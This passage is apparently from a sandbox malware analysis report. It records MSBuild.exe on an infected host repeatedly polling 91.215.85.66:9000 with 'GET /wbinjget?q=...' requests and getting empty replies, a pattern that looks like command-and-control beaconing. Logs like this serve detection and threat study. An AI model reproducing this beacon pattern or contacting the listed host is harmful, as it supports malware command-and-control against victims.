51	192.168.2.4	49807	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:25.978511095 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 25, 2024 12:17:26.222021103 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:26 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49808	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:26.568953991 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:26.812624931 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:26 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49809	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:27.166970968 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:27.416152000 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:27 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49810	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:27.772738934 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:28.036436081 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:27 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49811	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:28.397326946 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:28.679115057 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:28 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49812	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:29.039236069 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 25, 2024 12:17:29.295191050 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:28 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49813	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:29.663464069 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:29.963110924 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:29 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49814	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:30.323317051 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:30.568680048 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:29 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49815	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:30.927062035 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:31.181503057 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:30 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49816	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:31.537532091 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 25, 2024 12:17:31.783713102 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:30 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49817	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:32.145821095 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:32.394193888 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:32 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49818	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:32.750406981 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:32.995662928 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:32 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49819	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:33.354854107 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:33.597608089 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:33 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49820	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:33.943842888 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:34.212677002 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:33 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49821	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:34.579471111 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 25, 2024 12:17:34.844439983 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:34 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49822	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:35.208210945 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:35.456882954 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:34 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49823	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:35.816287994 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:36.064956903 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:35 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49824	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:36.418433905 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:36.661667109 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:35 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49825	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:37.019316912 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:37.271580935 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:37 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49826	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:37.626802921 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:37.879769087 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:37 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49827	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:38.237782955 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:38.486437082 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:38 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49828	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:38.851099014 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:39.101588011 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:38 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49829	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:39.455683947 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:39.706790924 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:39 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49830	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:40.055866957 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:40.302989006 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:39 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49831	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:40.770055056 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 25, 2024 12:17:41.019625902 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:40 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49832	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:42.007863998 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:42.251102924 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:41 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49833	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:42.612108946 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:42.871424913 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:41 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49834	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:43.234905958 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 25, 2024 12:17:43.486676931 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:43 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49835	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:43.851576090 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:44.100392103 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:43 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49836	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:44.456733942 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:44.705338001 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:44 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49837	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:45.065897942 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:45.318726063 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:45 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49838	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:45.672409058 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:45.921030045 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:45 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	49839	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:46.270152092 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 25, 2024 12:17:46.509933949 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:46 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	49840	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:46.864928007 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:47.107542992 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:46 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	49841	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:47.457596064 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:47.701267004 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:47 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	49842	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:48.053041935 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
